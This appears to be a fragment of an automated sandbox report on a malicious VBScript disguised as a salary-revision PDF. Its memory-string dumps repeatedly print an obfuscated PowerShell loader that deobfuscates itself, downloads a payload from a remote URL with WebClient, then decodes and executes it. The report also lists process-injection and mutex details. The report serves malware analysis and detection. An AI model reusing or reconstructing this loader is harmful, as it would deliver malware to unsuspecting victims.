IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4so
              Source: powershell.exe, 00000002.00000002.1531059954.000001C4FCFD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. Te2q)
              Source: powershell.exe, 00000002.00000002.1532176181.000001C4FD0A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"t
              Source: wscript.exe, 00000000.00000002.1357482533.0000023D99859000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
              Source: powershell.exe, 00000004.00000002.1636903665.0000000002FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWinsta0\Default
              Source: powershell.exe, 00000002.00000002.1530040187.000001C4FCDB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tly=29527;vandende (adiabaticlly ' dr$ ong ll lio beb ybaa.slnar:limb tiyyetdfireeftlkets frftrio,israposovegmeres ttse. sal=sto sang s.eburts.o-supcsypobrin .itpene h n.ntth n tis$skrb neegaltparakvalskai non u gbene afrlogscal ');vandende (adiabaticlly ' vg$ r !
              Source: wscript.exe, 00000000.00000003.1354223614.0000023D997D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354005111.0000023D997C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A
              Source: msiexec.exe, 00000007.00000002.2632696705.0000000004356000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: pOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB
              Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal
              Source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: B ybAA.slNar:LimB 49-
              Source: wscript.exe, 00000000.00000003.1353897138.0000023D9986B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sa&#
              Source: powershell.exeBinary or memory string: ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .it
              Source: powershell.exe, 00000002.00000002.1532176181.000001C4FD09C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"rr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"ngs
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@16/12@2/3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,11_2_004182CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,13_2_00410DE1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,11_2_00418758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,11_2_00413D4C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,11_2_004148B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Taxlessly199.ChoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MB
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_322i4ygj.2sk.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs"
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7540
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7844
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000007.00000002.2647383067.0000000021140000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
